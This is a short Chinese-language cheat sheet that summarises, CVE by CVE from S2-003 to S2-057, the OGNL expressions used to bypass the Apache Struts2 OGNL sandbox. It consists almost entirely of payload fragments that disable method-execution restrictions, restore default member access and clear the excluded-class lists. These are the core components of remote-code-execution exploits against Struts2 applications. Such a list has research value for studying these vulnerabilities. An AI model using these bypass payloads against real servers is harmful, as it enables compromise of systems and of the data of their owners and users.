Struts2 OGNL沙箱历史绕过方式总结
沙箱绕过
s2-003 绕过方式:
#context[\'xwork.MethodAccessor.denyMethodExecution\']=false,
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET
s2-005 绕过方式:
#_memberAccess.allowStaticMethodAccess=true
#context['xwork.MethodAccessor.denyMethodExecution']=false
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET
S2-009 绕过方式:
#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false)
#_memberAccess["allowStaticMethodAccess"]=true
S2-013 绕过方式:
#_memberAccess["allowStaticMethodAccess"]=true
S2-016 绕过方式:
没有沙箱限制,直接执行OGNL表达式(TODO 未做深入研究)
S2-019 绕过方式:
#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#f.setAccessible(true),
#f.set(#_memberAccess,true)
S2-032 绕过方式:
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
S2-037 绕过方式:
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
S2-045 绕过方式:
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(
#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))
S2-046 绕过方式:
和s2-045的绕过方式一致
S2-048 绕过方式:
和s2-045的绕过方式一致
S2-057 绕过方式:
(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))
(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))